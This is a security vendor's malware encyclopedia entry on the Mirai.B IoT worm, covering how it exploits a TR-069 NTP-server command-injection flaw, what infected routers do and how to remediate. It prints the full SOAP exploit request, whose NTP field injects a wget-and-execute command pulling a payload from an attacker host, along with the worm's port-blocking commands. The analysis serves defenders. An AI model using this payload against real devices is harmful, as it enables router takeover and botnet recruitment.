virus logo Virus

Linux/Mirai.B!worm

description-logoAnalysis

Linux/Mirai.B!worm is a bot which runs on Linux distributions on which busybox is available. It particularly targets IoT devices. Its well known variant, Linux/Mirai.A!worm, is known to have caused DDoS of several companies and websites. So far, Linux/Mirai.B!worm is said to have affected a German operator.

The malware exploits a known vulnerability in the TR-069 configuration protocol. The TR-069 protocol is used to manage routers and modems. With TR-069, you can:

  • Get information on the router or modem
  • Run DSL diagnostics
  • Adjust time
  • ...
Concerning time adjustment, it is possible to specify a NTP server to use and automatically synchronize time. Unfortunately, the implementation of the protocol is vulnerable on some routers and modems and allows for code execution.
Linux/Mirai.B!worm exploits this vulnerability and crafts a special request to configure a new NTP server, but instead of providing the name of a valid NTP server, it provides shell code that downloads a malicious payload from a remote server. For example: 
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>
<NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>
</u:SetNTPServers>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
In that case, the malicious sample sets the new NTP server to 
`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`
This means it goes to tmp directory, downloads a malicious payload from a website named l.ocalhost.host (note this is different from localhost - the server does not resolve any longer), the malicious payload is named 2. This program is set as executable, and run.
An infected device does the following:
  • Scan devices for open port 7547 (that's the port for TR-069). If it is open, attempt to infect by posting the SOAP request we displayed above.
  • Block port 7547 to prevent re-infection. This is done by a simple iptables command: 
    busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP
  • Block telnet as well 
    busybox killall -9 telnetd

recommended-action-logoRecommended Action

To cure the device:

  1. Reboot the device. The malware does not persist after reboot.
  2. Update the device's firmware (if possible) so that it is no longer vulnerable

Telemetry logoTelemetry

Detection Availability

FortiClient
Extreme
FortiMail
Extreme
FortiSandbox
Extreme
FortiWeb
Extreme
Web Application Firewall
Extreme
FortiIsolator
Extreme
FortiDeceptor
Extreme
FortiEDR

Version Updates

Date Version Detail
2019-04-02 67.50600 Sig Updated
ID 7244913
Released Nov 29, 2016
Description
Updated		 Dec 01, 2016
Aliases .
Profile Type Worm (worm)